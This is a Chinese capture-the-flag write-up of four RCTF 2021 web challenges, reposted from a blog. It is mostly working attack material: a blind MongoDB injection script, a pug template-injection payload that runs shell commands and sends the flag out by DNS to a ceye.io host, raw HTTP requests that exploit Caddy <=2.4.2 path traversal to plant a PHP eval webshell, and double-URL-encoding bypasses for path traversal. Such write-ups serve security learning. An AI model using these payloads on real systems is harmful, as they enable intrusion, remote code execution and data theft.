RCTF2021webWP
CandyShop
user.js
Mongodb注入
let rec = await db.Users.find({username: username, password: password})
利用脚本
import requests
from urllib.parse import quote
url = ‘http://123.60.21.23:23333/user/login‘
result = ‘‘
for i in range(1, 233):
ascii_min = 0
ascii_max = 128
while ascii_max - ascii_min > 1:
mid = (ascii_min + ascii_max) // 2
data = ‘username=rabbit&password[$lt]=‘ + quote(result + chr(mid))
r = requests.post(url, data=data, headers={‘Content-Type‘: ‘application/x-www-form-urlencoded‘})
if ‘Bad‘ in r.text:
ascii_max = mid
else:
ascii_min = mid
print(ascii_min, ascii_max, mid)
if ascii_min == 0:
break
result += chr(ascii_min)
print(result)
print(result)
# 49149bea75a9003d186556101ca2ad2fcd3115753d08d4bc21027c015dd653bf
shop.js
pug模板注入
模板部分内容可控,可以执行任意的js代码
pug模板对格式有一定的限制,能够成功执行命令,但无回显,通过dnslog得到flag
const pug = require(‘pug‘)
router.post(‘/order‘, checkLogin, checkActive, async (req, res) => {
let {username, candyname, address} = req.body
let tpl_path = path.join(__dirname, ‘../views/confirm.pug‘)
fs.readFile(tpl_path, (err, result) => {
if (err) {
res.render(‘error‘, {error: ‘Fail to load template!‘})
} else {
// 模板渲染前的文本替换
let tpl = result
.toString()
.replace(‘USERNAME‘, username)
.replace(‘CANDYNAME‘, candyname)
.replace(‘ADDRESS‘, address)
res.send(pug.render(tpl, options={filename: tpl_path}))//模板注入
}
})
})
POST /shop/order
username=‘ readonly) %0a %23{console.log(global.process.mainModule.constructor._load("child_process").execSync("ping `cat /flag`.xxx.ceye.io").toString())} // &candyname=bunny_candy&address=1
VerySafe
Caddy <= 2.4.2 在传递script_path给php-fpm的时候可以目录穿越
在默认php-fpm的docker和caddy<=2.4.2的环境下无条件RCE
GET /../usr/local/lib/php/peclcmd.php?+config-create+/tmp/<?=eval($_POST[1]);?>/*+/srv/qqqq.php HTTP/1.1
Host: test.local:54120
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
################
POST /../tmp/qqqq.php HTTP/1.1
Host: test.local:54120
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
1=system(‘/readflag‘);
EasyPHP
nginx.conf
#/admin只能本地访问
location /admin {
allow 127.0.0.1;
deny all;
}
location @phpfpm {
include fastcgi_params;
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_pass php:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root/index.php;
#REQUEST_URI 来自 $uri, $uri 是没有经过urldecode的. PHP-FPM 回对收到的REQUEST_URI进行urldecode
fastcgi_param REQUEST_URI $uri;
}
index.php
function isdanger($v){
if(is_array($v)){
foreach($v as $k=>$value){
if(isdanger($k)||isdanger($value)){
return true;
}
}
}else{
if(strpos($v,"../")!==false){
return true;
}
}
return false;
}
# ../ 不能出现在 $_GET,$_POST,$_COOKIE,$_SESSION
$app->before("start",function(){
foreach([$_GET,$_POST,$_COOKIE,$_FILES] as $value){
if(isdanger($value)){
die("go away hack");
}
}
});
# 非admin只能访问/login
$app->route(‘/*‘, function(){
global $app;
$request = $app->request();
$app->render("head",[],"head_content");
# url中要包含 login
if(stristr($request->url,"login")!==FALSE){
return true;
}else{
if($_SESSION["user"]){
return true;
}
$app->redirect("/login");
}
});
Router.php
public function route(Request $request) {
# 被路由前,会对URL进行一次urldecode,利用二次url编码绕过
# /%2561%2564%256d%2569%256e ==> /admin
$url_decoded = urldecode( $request->url );
while ($route = $this->current()) {
if ($route !== false && $route->matchMethod($request->method) && $route->matchUrl($url_decoded, $this->case_sensitive)) {
return $route;
}
$this->next();
}
return false;
}
绕过验证
http://124.71.132.232:60080/%2561%2564%256d%2569%256e%3flogin
index.php
代码是针对$_GET来过滤的,要读取的文件名却是从"./".$request->query->data获取
$app->route(‘/admin‘, function(){
global $app;
$request = $app->request();
#
$app->render("admin",["data"=>"./".$request->query->data],"body_content");
$app->render("template",[]);
});
Request.php
$request->query在init中被覆盖
public function init(){
...
// Default url
if (empty($this->url)) {
$this->url = ‘/‘;
}
// Merge URL query parameters with $_GET
else {
$_GET += self::parseQuery($this->url);
$this->query->setData($_GET);
}
...
}
public static function parseQuery($url) {
$params = array();
$args = parse_url($url);
if (isset($args[‘query‘])) {
parse_str($args[‘query‘], $params);
}
return $params;
}
最后
http://124.71.132.232:60080/%2561%2564%256d%2569%256e%3flogin&data=..%252f..%252f..%252f..%252fflag
RCTF2021webWP
原文:https://www.cnblogs.com/shivers0x72/p/15302435.html